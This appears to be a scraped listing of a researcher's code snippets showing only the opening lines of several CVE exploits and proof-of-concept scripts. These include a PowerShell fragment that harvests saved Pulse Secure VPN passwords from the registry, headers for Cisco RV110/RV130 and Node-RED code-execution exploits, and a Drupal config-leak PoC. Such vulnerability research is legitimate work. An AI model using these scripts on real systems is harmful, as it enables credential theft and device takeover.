View CVE-2020-8956.ps1
Add-Type -AssemblyName System.Security;
$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*'
foreach($ive in $ives) {
$ivename = $ive.PSPath.split('\')[-1].ToUpper()
Write-Host "[+] Checking IVE $($ivename)..."
$seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename)
# 3 possible value names for password
$encrypted = $ive.Password1
if(!$encrypted){
View CVE_2019_1663_RV110.py
#!/usr/bin/env python
"""
Exploit for Cisco RV110 stack buffer overflow (CVE-2019-1663).
---------------------------------------------------------------
It simply executes a ret2libc, calling system() with whatever's on the stack
as argument. Offsets are for QEMU target.
First MIPS-based exploit, might delete later.
"""
import requests
View CVE_2019_1663_RV130.py
#!/usr/bin/env python
"""
Exploit for Cisco RV130 stack-based buffer overflow (CVE-2019-1663).
This piece of code will get you proper 'return to zero protection', that is
an executable stack (thanks, mprotect) and $pc pointing to the beginning of
the stack.
Enjoy your shells responsibly :)
"""
View mmc_dump.py
#!/usr/bin/env python
"""
Dump MMC memory from Airmedia AM-100 or similar devices.
# Dumping process steps
* drop to u-boot shell
* sanity check with printenv
* load 512 bytes memory chunk from MMC to RAM at known safe address with "mmcread"
* display 512 bytes of memory from RAM at known safe address with "md.b"
View noderedsh.py
#!/usr/bin/env python3
"""
----------------------------------------------------------------------------
"THE BEER-WARE LICENSE" (Revision 42):
QKaiser wrote this file. As long as you retain this notice you
can do whatever you want with this stuff. If we meet some day, and you think
this stuff is worth it, you can buy me a beer in return.
----------------------------------------------------------------------------
----------------------------------------------------------------------------
Node-RED Remote Command Execution exploit.
View setup.sh
#!/bin/bash
SDK_SHA512="02c6e8abbfa05072fbc139bc6c1d88245338631e7fa2776cbb2097ff1989fc6af595049a1bf7223dc0d39aa2bb1f31394cbadbcec45aa343d133f9f360675f99"
SDK_DOWNLOAD_LINK="https://www.eclipse.org/downloads/download.php?file=/equinox/drops/R-Oxygen.2-201711300510/equinox-SDK-Oxygen.2.zip&r=1"
SDK_FILENAME="equinox-SDK-Oxygen.2.zip"
echo "[+] Downloading SDK ..."
wget -q $SDK_DOWNLOAD_LINK -O $SDK_FILENAME
echo "[+] Checking checksums ..."
echo "$SDK_SHA512 $SDK_FILENAME" | sha512sum -c -
View SA_CORE_2016_004.sh
#!/bin/bash
#
# PoC for SA-CORE-2016-004
# Full config export can be downloaded without administrative permissions
#
# The idea is to grep for sensitive information within the exported
# config files. Feel free to add your own findings :)
#
###############################################################################